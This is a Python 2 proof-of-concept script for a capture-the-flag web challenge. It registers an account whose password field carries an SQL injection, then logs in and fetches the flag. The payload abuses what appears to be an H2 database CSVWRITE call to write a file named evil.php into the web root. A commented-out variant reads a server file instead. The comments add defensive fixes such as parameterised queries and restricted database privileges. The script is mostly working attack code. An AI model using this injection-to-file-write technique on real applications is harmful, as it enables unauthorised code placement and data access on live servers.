#!/usr/bin/python
# Python 2 script (print statements, str.encode('hex')). Proof-of-concept client
# for a CTF web challenge: it registers a throwaway account whose password field
# carries an SQL payload, logs in, then requests the flag. Read it as a worked
# example of what an unparameterised registration query exposes; the defensive
# fixes are noted next to the payload below.
import os
import requests

# Single challenge endpoint; every action below is a form POST to this URL.
URL = 'http://203.66.14.60/do.php'


def login(username, password):
    """POST a login form (action=login) and return the requests.Response.

    Whatever cookies the server sets on this response are later forwarded
    verbatim by flag() via ``response.cookies``.
    """
    login_req = {
        'username': username,
        'password': password,
        'action': 'login',
    }
    return requests.post(URL, data=login_req)


def register(username, password):
    """POST a registration form (action=register) and return the Response.

    The password is sent exactly as given; no escaping happens on this side,
    which is how the injected SQL string built below reaches the server.
    """
    register_req = {
        'username': username,
        'password': password,
        'action': 'register',
    }
    return requests.post(URL, data=register_req)


def flag(cookies):
    """POST action=flag, attaching the given cookie jar, and return the Response."""
    flag_req = {
        'action': 'flag',
    }
    return requests.post(URL, data=flag_req, cookies=cookies)


def print_r(r):
    """Dump a response's headers and body to stdout, followed by a blank line."""
    print r.headers
    print r.text
    print


# Fresh 16-hex-character username per run so repeated attempts do not collide
# with an account that already exists.
username = os.urandom(8).encode('hex')
print 'username =', username


def encode(x):
    """Hex-encode *x* with a NUL byte placed before every character.

    For ASCII input this is the UTF-16BE byte form, rendered as hex. It is
    presumably the shape the server-side hextoraw() call below needs to
    decode the text as a string -- TODO confirm against the target DB.
    """
    out = ''
    for c in x:
        out += '\0' + c
    return out.encode('hex')


# Payload placed in the password field. It closes the quoted value ("test'"),
# appends an extra column expression that calls CSVWRITE() with a path under
# the web root, and comments out the remainder of the statement ("-- ").
# CSVWRITE()/hextoraw() look like H2 database functions -- verify.
# Defensive takeaways for the server side: bind parameters instead of
# concatenating form fields into SQL; run the application's DB account without
# file-system write privileges; and disable file/CSV export functions that the
# application never needs, so an injection cannot turn into a file write.
myq = encode("select ''")
password = "test',(CSVWRITE('/var/www/html/evil.php', hextoraw('%s')))); -- " % myq
#password = "test',file_read('/tmp/evil')); -- "

register_r = register(username, password)
print_r(register_r)

# Log in with just the literal prefix 'test' -- presumably what the injected
# INSERT actually stored as the password; verify against the server's schema.
password = 'test'
login_r = login(username, password)
print_r(login_r)

# Forward the cookies from the login response when asking for the flag.
flag_r = flag(login_r.cookies)
print_r(flag_r)